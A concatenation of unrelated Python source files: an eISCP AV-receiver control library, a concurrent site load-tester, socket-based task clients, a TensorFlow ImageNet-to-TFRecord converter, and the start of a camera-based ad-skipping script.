return ISCPMessage.parse(body.decode())
def raw(self, iscp_message):
"""Send a low-level ISCP message, like ``MVL50``, and wait
for a response.
While the protocol is designed to acknowledge each message with
a response, there is no fool-proof way to differentiate those
from unsolicited status updates, though we'll do our best to
try. Generally, this won't be an issue, though in theory the
response this function returns to you sending ``SLI05`` may be
an ``SLI06`` update from another controller.
It'd be preferable to design your app in a way where you are
processing all incoming messages the same way, regardless of
their origin.
"""
while self.get(False):
# Clear all incoming messages. If not yet queried,
# they are lost. This is so that we can find the real
# response to our sent command later.
pass
self.send(iscp_message)
return filter_for_message(self.get, iscp_message)
def command(self, command, arguments=None, zone=None):
"""Send a high-level command to the receiver, return the
receiver's response formatted has a command.
This is basically a helper that combines :meth:`raw`,
:func:`command_to_iscp` and :func:`iscp_to_command`.
"""
iscp_message = command_to_iscp(command, arguments, zone)
response = self.raw(iscp_message)
if response:
return iscp_to_command(response)
def power_on(self):
"""Turn the receiver power on."""
return self.command('power', 'on')
def power_off(self):
"""Turn the receiver power off."""
return self.command('power', 'off')
class Receiver(eISCP):
"""Changes the behaviour of :class:`eISCP` to use a background
thread for network operations. This allows receiving messages
from the receiver via a callback::
def message_received(message):
print message
receiver = Receiver('...')
receiver.on_message = message_received
The argument ``message`` is
"""
@classmethod
def discover(cls, timeout=5, clazz=None):
return eISCP.discover(timeout, clazz or Receiver)
def _ensure_thread_running(self):
if not getattr(self, '_thread', False):
self._stop = False
self._queue = queue.Queue()
self._thread = threading.Thread(target=self._thread_loop)
self._thread.start()
def disconnect(self):
self._stop = True
self._thread.join()
self._thread = None
def send(self, iscp_message):
"""Like :meth:`eISCP.send`, but sends asynchronously via the
background thread.
"""
self._ensure_thread_running()
self._queue.put((iscp_message, None, None))
def get(self, *a, **kw):
"""Not supported by this class. Use the :attr:`on_message``
hook to handle incoming messages.
"""
raise NotImplementedError()
def raw(self, iscp_message):
"""Like :meth:`eISCP.raw`.
"""
self._ensure_thread_running()
event = threading.Event()
result = []
self._queue.put((iscp_message, event, result))
event.wait()
if isinstance(result[0], Exception):
raise result[0]
return result[0]
def _thread_loop(self):
def trigger(message):
if self.on_message:
self.on_message(message)
eISCP._ensure_socket_connected(self)
try:
while not self._stop:
# Clear all incoming message first.
while True:
msg = eISCP.get(self, False)
if not msg:
break
trigger(msg)
# Send next message
try:
item = self._queue.get(timeout=0.01)
except queue.Empty:
continue
if item:
message, event, result = item
eISCP.send(self, message)
# Wait for a response, if the caller so desires
if event:
try:
# XXX We are losing messages here, since
# those are not triggering the callback!
# eISCP.raw() really has the same problem,
# messages being dropped without a chance
# to get() them. Maybe use a queue after all.
response = filter_for_message(
super(Receiver, self).get, message)
except ValueError as e:
# No response received within timeout
result.append(e)
else:
result.append(response)
# Mark as processed
event.set()
finally:
eISCP.disconnect(self)
|
surfer.py
|
import time
import random
import argparse
from multiprocessing import Process
import requests
from surfer_helper import (
ignore_keyboard_exception, resolve_post_hook, print_result
)
@ignore_keyboard_exception
def main(options):
url = options["url"]
num_processes = options["c"]
num_requests = options["n"]
response_callback = resolve_post_hook(options["post_hook"])
processes = []
for i in range(num_processes):
p = Process(target=request, args=(i, url, num_requests, response_callback))
p.start()
processes.append(p)
for p in processes:
p.join()
@ignore_keyboard_exception
def request(i, url, num_requests, response_callback):
for j in range(num_requests):
time.sleep(2 * random.random())
response = requests.get(url)
print_result(i + 1, j + 1, response)
responses = response_callback(response)
if responses:
for r in responses:
print_result(i + 1, j + 1, r)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Surf your own site concurrently')
parser.add_argument(
'url',
help='URL to use for testing. Example: http://localhost:8080',
)
parser.add_argument(
'-c',
type=int,
default=1,
help='Number of concurrent processes. Example: -c 10',
)
parser.add_argument(
'-n',
type=int,
default=1,
help='Number of requests per process. Example: -n 10',
)
parser.add_argument(
'--post-hook',
help="""
Dotted path to a python module with a method called run
that takes the completed response and does something custom.
Can optionally return a list of new responses that will then be
logged to console the same way normal requests are.
Example: --post-hook my_module
(where my_module.py is in the same directory and contains
"def run(response): ...")
"""
)
kwargs = parser.parse_args()
main(vars(kwargs))
|
client.py
|
import logging
import subprocess
import multiprocessing
import sys
import uuid
import time
from socketIO_client import SocketIO, LoggingNamespace, BaseNamespace
class appOUT(object):
def __init__(self,log_queue=None):
self.logger=log_queue
def flush(self):
pass
def write(self, s):
self.logger.put("[syslog][{2}][{1}]{0}".format(s,time.asctime( time.localtime(time.time()) ),multiprocessing.current_process().name))
#sys.__stdout__.write(s)
class app_client(BaseNamespace):
def __init__(self,*args):
BaseNamespace.__init__(self,*args)
self.run_ready=multiprocessing.Lock()
self.run_ready.acquire()
#self init
manager=multiprocessing.Manager()
self.log=manager.Queue()
self.log_err=manager.Queue()
self.requestQueue = manager.Queue()
self.responseQueue = manager.Queue()
self.prepare()
def prepare(self):
"""
run on the start and init all
"""
self.metadata={}
self.run_ready.release()
pass
def on_ask_init(self,*args):
info_pack=args[0]
self.metadata=info_pack
# print("\n\n\ninfo:\nsid:{0}\nthread:{1}\n\n".format(self.metadata['sid'],self.metadata['thread_id']))
self.emit("client_free", info_pack)
def on_connect(self, *args):
#self.emit("client_free", None)
pass
def on_task(self, *args):
p = multiprocessing.Process(target=self.run_mp, args=(args[0],))
p.start()
return
def run_mp(self,arg):
#arg['metadata']=self.metadata
ret={'metadata':arg['metadata'],"status":-1,"arg":arg,"err":""}
pkg=self.run(arg)
if pkg['err']:
raise pkg['err']
ret['err']="{0}".format(pkg['err'])
else:
ret={'metadata':arg['metadata'],"status":1,"arg":pkg['ret']}
self.emit('result',ret)
def thread_loop(self,id,stdout=sys.__stdout__):
raise NotImplementedError()
def boot_mp(self,thread_num=4):
class appOUT(object):
def __init__(self,log_queue):
self.logger=log_queue
def flush(self):
pass
def write(self, s):
self.logger.put(s)
#sys.__stdout__.write(s)
self.p_list=[None for i in range(thread_num)]
self.p_list_pipe=[None for i in range(thread_num)]
for i in range(thread_num):
self.p_list[i]=multiprocessing.Process(target=self.thread_loop ,args=(i, appOUT(self.log), appOUT(self.log_err)),name="Task_thread_{0}".format(i))
self.p_list[i].start()
def run(self,args):
"""
:param args all needed data from server
"""
local_id = "{0}".format(uuid.uuid4())
pkg={"args":args,'local_id':local_id}
self.requestQueue.put(pkg)
p={}
while (1):
p = self.responseQueue.get()
if p['id'] == local_id:
break
self.responseQueue.put(p)
return {'ret':p['tensor'],'err':p['err']}
|
client.py
|
import socket
import requests
import sys
from socket import AF_INET, SOCK_STREAM
import threading
import time
import logging
logging.basicConfig(filename="client.log", level=logging.DEBUG)
logger = logging.getLogger(" [CLIENT] - ")
class IRCClient(object):
def __init__(self, host, port, name):
self.host = host
self.port = port
self.name = name
def return_res(self, data):
data = data.split(" ")[1].split(",")
output_f = 0
for item in data:
output_f += int(item)
return str(output_f)
def start_client(self):
s_fd = socket.socket(AF_INET, SOCK_STREAM)
s_fd.connect((self.host, self.port))
self.register_client(s_fd)
threading.Thread(target=self.listen_for_server_input, args=(s_fd, )).start()
# To allow proper printing of description on console
time.sleep(2)
first_time = True
while True:
data = raw_input("")
s_fd.sendall(data)
s_fd.close()
def listen_for_server_input(self, s_fd):
logger.info("Listening for server input on separate thread\n")
while True:
data = s_fd.recv(4096)
print("[SERVER] - {}".format(data))
if "COMPUTE" in data.split(" ")[0]:
print("Server wants client to compute something {}".format(data))
s_fd.sendall("COMPUTE " + self.return_res(data))
print("Sent COMPUTE to server")
s_fd.sendall("COMPUTE {}".format(16))
print("Sent COMPUTE {}".format(16))
def register_client(self, s_fd):
logger.debug("Registering client")
s_fd.sendall("REGISTER {}\n".format(self.name))
data = s_fd.recv(4096)
print(data)
def main(host, port, name):
irc_client = IRCClient(host, int(port), name)
irc_client.start_client()
if __name__ == '__main__':
if len(sys.argv) < 2:
print("Usage: python client.py <name>")
sys.exit(1)
else:
host, port, name = requests.get("http://localhost:6666/server").text.split(":")
try:
main(host, port, sys.argv[1])
except socket.error:
print("Exception caught while connecting to server, please check if {}:{} is running".format(host, port))
|
build_imagenet_data.py
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts ImageNet data to TFRecords file format with Example protos.
The raw ImageNet data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
...
where 'n01440764' is the unique synset label associated with
these images.
The training data set consists of 1000 sub-directories (i.e. labels)
each containing 1200 JPEG images for a total of 1.2M JPEG images.
The evaluation data set consists of 1000 sub-directories (i.e. labels)
each containing 50 JPEG images for a total of 50K JPEG images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of 1024 and 128 TFRecord files, respectively.
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-00127-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
Each validation TFRecord file contains ~390 records. Each training TFREcord
file contains ~1250 records. Each record within the TFRecord file is a
serialized Example proto. The Example proto contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [1, 1000] where 0 is not used.
image/class/synset: string specifying the unique ID of the label,
e.g. 'n01440764'
image/class/text: string specifying the human-readable version of the label
e.g. 'red fox, Vulpes vulpes'
image/object/bbox/xmin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/xmax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/label: integer specifying the index in a classification
layer. The label ranges from [1, 1000] where 0 is not used. Note this is
always identical to the image label.
Note that the length of xmin is identical to the length of xmax, ymin and ymax
for each example.
Running this script using 16 threads may take around ~2.5 hours on a HP Z420.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import google3
import numpy as np
from six.moves import xrange
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 1024,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 128,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 8,
'Number of threads to preprocess the images.')
# The labels file contains a list of valid labels are held in this file.
# Assumes that the file contains entries as such:
# n01440764
# n01443537
# n01484850
# where each line corresponds to a label expressed as a synset. We map
# each synset contained in the file to an integer (based on the alphabetical
# ordering). See below for details.
tf.app.flags.DEFINE_string('labels_file',
'imagenet_lsvrc_2015_synsets.txt',
'Labels file')
# This file containing mapping from synset to human-readable label.
# Assumes each line of the file looks like:
#
# n02119247 black fox
# n02119359 silver fox
# n02119477 red fox, Vulpes fulva
#
# where each line corresponds to a unique mapping. Note that each line is
# formatted as <synset>\t<human readable label>.
tf.app.flags.DEFINE_string('imagenet_metadata_file',
'imagenet_metadata.txt',
'ImageNet metadata file')
# This file is the output of process_bounding_box.py
# Assumes each line of the file looks like:
#
# n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
#
# where each line corresponds to one bounding box annotation associated
# with an image. Each line can be parsed as:
#
# <JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
#
# Note that there might exist mulitple bounding box annotations associated
# with an image file.
tf.app.flags.DEFINE_string('bounding_box_file',
'./imagenet_2012_bounding_boxes.csv',
'Bounding box file')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _float_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, synset, human, bbox,
height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
synset: string, unique WordNet ID specifying the label, e.g., 'n02323233'
human: string, human-readable label, e.g., 'red fox, Vulpes vulpes'
bbox: list of bounding boxes; each box is a list of integers
specifying [xmin, ymin, xmax, ymax]. All boxes are assumed to belong to
the same label as the image label.
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
xmin = []
ymin = []
xmax = []
ymax = []
for b in bbox:
assert len(b) == 4
# pylint: disable=expression-not-assigned
[l.append(point) for l, point in zip([xmin, ymin, xmax, ymax], b)]
# pylint: enable=expression-not-assigned
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(colorspace),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/synset': _bytes_feature(synset),
'image/class/text': _bytes_feature(human),
'image/object/bbox/xmin': _float_feature(xmin),
'image/object/bbox/xmax': _float_feature(xmax),
'image/object/bbox/ymin': _float_feature(ymin),
'image/object/bbox/ymax': _float_feature(ymax),
'image/object/bbox/label': _int64_feature([label] * len(xmin)),
'image/format': _bytes_feature(image_format),
'image/filename': _bytes_feature(os.path.basename(filename)),
'image/encoded': _bytes_feature(image_buffer)}))
return example
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that converts CMYK JPEG data to RGB JPEG data.
self._cmyk_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_jpeg(self._cmyk_data, channels=0)
self._cmyk_to_rgb = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def cmyk_to_rgb(self, image_data):
return self._sess.run(self._cmyk_to_rgb,
feed_dict={self._cmyk_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
# File list from:
# https://groups.google.com/forum/embed/?place=forum/torch7#!topic/torch7/fOSTXHIESSU
return 'n02105855_2933.JPEG' in filename
def _is_cmyk(filename):
"""Determine if file contains a CMYK JPEG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a JPEG encoded with CMYK color space.
"""
# File list from:
# https://github.com/cytsai/ilsvrc-cmyk-image-list
blacklist = ['n01739381_1309.JPEG', 'n02077923_14822.JPEG',
'n02447366_23489.JPEG', 'n02492035_15739.JPEG',
'n02747177_10752.JPEG', 'n03018349_4028.JPEG',
'n03062245_4620.JPEG', 'n03347037_9675.JPEG',
'n03467068_12171.JPEG', 'n03529860_11437.JPEG',
'n03544143_17228.JPEG', 'n03633091_5218.JPEG',
'n03710637_5125.JPEG', 'n03961711_5286.JPEG',
'n04033995_2932.JPEG', 'n04258138_17003.JPEG',
'n04264628_27969.JPEG', 'n04336792_7448.JPEG',
'n04371774_5854.JPEG', 'n04596742_4225.JPEG',
'n07583066_647.JPEG', 'n13037406_4650.JPEG']
return filename.split('/')[-1] in blacklist
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
image_data = tf.gfile.FastGFile(filename, 'r').read()
# Clean the dirty data.
if _is_png(filename):
# 1 image is a PNG.
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
elif _is_cmyk(filename):
# 22 JPEG images are in CMYK colorspace.
print('Converting CMYK to RGB for %s' % filename)
image_data = coder.cmyk_to_rgb(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in xrange(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
synset = synsets[i]
human = humans[i]
bbox = bboxes[i]
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(filename, image_buffer, label,
synset, human, bbox,
height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, synsets, labels, humans,
bboxes, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(synsets)
assert len(filenames) == len(labels)
assert len(filenames) == len(humans)
assert len(filenames) == len(bboxes)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in xrange(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in xrange(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the ImageNet data set resides in JPEG files located in
the following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
where 'n01440764' is the unique synset label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
n01440764
n01443537
n01484850
where each line corresponds to a label expressed as a synset. We map
each synset contained in the file to an integer (based on the alphabetical
ordering) starting with the integer 1 corresponding to the synset
contained in the first line.
The reason we start the integer labels at 1 is to reserve label 0 as an
unused background class.
Returns:
filenames: list of strings; each string is a path to an image file.
synsets: list of strings; each string is a unique WordNet ID.
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
challenge_synsets = [l.strip() for l in
tf.gfile.FastGFile(labels_file, 'r').readlines()]
labels = []
filenames = []
synsets = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for synset in challenge_synsets:
jpeg_file_path = '%s/%s/*.JPEG' % (data_dir, synset)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
synsets.extend([synset] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(challenge_synsets)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = range(len(filenames))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
synsets = [synsets[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(challenge_synsets), data_dir))
return filenames, synsets, labels
def _find_human_readable_labels(synsets, synset_to_human):
"""Build a list of human-readable labels.
Args:
synsets: list of strings; each string is a unique WordNet ID.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
Returns:
List of human-readable strings corresponding to each synset.
"""
humans = []
for s in synsets:
assert s in synset_to_human, ('Failed to find: %s' % s)
humans.append(synset_to_human[s])
return humans
def _find_image_bounding_boxes(filenames, image_to_bboxes):
"""Find the bounding boxes for a given image file.
Args:
filenames: list of strings; each string is a path to an image file.
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
Returns:
List of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
"""
num_image_bbox = 0
bboxes = []
for f in filenames:
basename = os.path.basename(f)
if basename in image_to_bboxes:
bboxes.append(image_to_bboxes[basename])
num_image_bbox += 1
else:
bboxes.append([])
print('Found %d images with bboxes out of %d images' % (
num_image_bbox, len(filenames)))
return bboxes
def _process_dataset(name, directory, num_shards, synset_to_human,
image_to_bboxes):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
"""
filenames, synsets, labels = _find_image_files(directory, FLAGS.labels_file)
humans = _find_human_readable_labels(synsets, synset_to_human)
bboxes = _find_image_bounding_boxes(filenames, image_to_bboxes)
_process_image_files(name, filenames, synsets, labels,
humans, bboxes, num_shards)
def _build_synset_lookup(imagenet_metadata_file):
"""Build lookup for synset to human-readable label.
Args:
imagenet_metadata_file: string, path to file containing mapping from
synset to human-readable label.
Assumes each line of the file looks like:
n02119247 black fox
n02119359 silver fox
n02119477 red fox, Vulpes fulva
where each line corresponds to a unique mapping. Note that each line is
formatted as <synset>\t<human readable label>.
Returns:
Dictionary of synset to human labels, such as:
'n02119022' --> 'red fox, Vulpes vulpes'
"""
lines = tf.gfile.FastGFile(imagenet_metadata_file, 'r').readlines()
synset_to_human = {}
for l in lines:
if l:
parts = l.strip().split('\t')
assert len(parts) == 2
synset = parts[0]
human = parts[1]
synset_to_human[synset] = human
return synset_to_human
def _build_bounding_box_lookup(bounding_box_file):
"""Build a lookup from image file to bounding boxes.
Args:
bounding_box_file: string, path to file with bounding boxes annotations.
Assumes each line of the file looks like:
n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
where each line corresponds to one bounding box annotation associated
with an image. Each line can be parsed as:
<JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
Note that there might exist mulitple bounding box annotations associated
with an image file. This file is the output of process_bounding_boxes.py.
Returns:
Dictionary mapping image file names to a list of bounding boxes. This list
contains 0+ bounding boxes.
"""
lines = tf.gfile.FastGFile(bounding_box_file, 'r').readlines()
images_to_bboxes = {}
num_bbox = 0
num_image = 0
for l in lines:
if l:
parts = l.split(',')
assert len(parts) == 5, ('Failed to parse: %s' % l)
filename = parts[0]
xmin = float(parts[1])
ymin = float(parts[2])
xmax = float(parts[3])
ymax = float(parts[4])
box = [xmin, ymin, xmax, ymax]
if filename not in images_to_bboxes:
images_to_bboxes[filename] = []
num_image += 1
images_to_bboxes[filename].append(box)
num_bbox += 1
print('Successfully read %d bounding boxes '
'across %d images.' % (num_bbox, num_image))
return images_to_bboxes
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Build a map from synset to human-readable label.
synset_to_human = _build_synset_lookup(FLAGS.imagenet_metadata_file)
image_to_bboxes = _build_bounding_box_lookup(FLAGS.bounding_box_file)
# Run it!
_process_dataset('validation', FLAGS.validation_directory,
FLAGS.validation_shards, synset_to_human, image_to_bboxes)
_process_dataset('train', FLAGS.train_directory, FLAGS.train_shards,
synset_to_human, image_to_bboxes)
if __name__ == '__main__':
tf.app.run()
|
StartSkip.py
|
from flask_restful import Api, Resource, reqparse
from flask import Request
from urllib.parse import urlencode
import requests
import time, threading
import sqlite3
import tensorflow as tf
import matplotlib.pyplot as plt
import os
import numpy as np
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.preprocessing import image
from tensorflow import keras
#from picamera import PiCamera
from cv2 import *
from numpy import exp
from time import sleep
from random import randrange
import shutil
import serial
import datetime
StartTime=time.time()
con = sqlite3.connect("skippi.db")
selectedIP = ""
dirname=os.path.dirname(__file__)
pathToModel = dirname+ '/ai/skipBotModelDataColorv22TF2_0_0BigColorv12.h5'
pathToImage =dirname+ '/holdImages/img.jpg'
print(pathToModel)
print(pathToImage)
model = keras.models.load_model(pathToModel, compile=False)
def action() :
con = sqlite3.connect("skippi.db")
con.row_factory = sqlite3.Row
cur = con.cursor()
cur.execute("SELECT running FROM run_status")
runStatus = cur.fetchall()
con.row_factory = sqlite3.Row
cur = con.cursor()
cur.execute("SELECT ip FROM tv_ip")
selectedIP = cur.fetchall()
con.row_factory = sqlite3.Row
cur = con.cursor()
cur.execute("SELECT cameraType, cameraNumber FROM camera_type")
cameraInfo = cur.fetchall()
con.row_factory = sqlite3.Row
cur = con.cursor()
cur.execute("SELECT skipMethod FROM skip_method")
skipMethodInfo = cur.fetchall()
con.row_factory = sqlite3.Row
cur = con.cursor()
cur.execute("SELECT hour , endTime FROM end_timer")
endTimerInfo = cur.fetchall()
if len(selectedIP)>0:
selectedIP = selectedIP[0][0]
#need test here
print('test')
print(runStatus[0][0])
if endTimerInfo[0][1] != 0:
if datetime.datetime.strptime(endTimerInfo[0][1], "%Y-%m-%dT%H:%M:%S") < datetime.datetime.now():
con.execute("DELETE FROM end_timer")
cur = con.cursor()
cur.execute("INSERT into end_timer (hour,endTime) values (?,?)",("0","0"))
con.commit()
con.execute("DELETE FROM run_status")
cur = con.cursor()
cur.execute("INSERT into run_status (running) values (?)",("0"))
con.commit()
if runStatus[0][0] == "1":
if cameraInfo[0][0] == 0:
camera = PiCamera()
camera.capture(pathToImage)
camera.close()
elif cameraInfo[0][0] == 1:
#else use USB webcam
cam = VideoCapture(cameraInfo[0][1])
s, img = cam.read()
if s: # frame captured without any errors
namedWindow("cam-test",CV_WINDOW_AUTOSIZE)
imshow("cam-test",img)
waitKey(0)
destroyWindow("cam-test")
imwrite(pathToImage,img) #save image
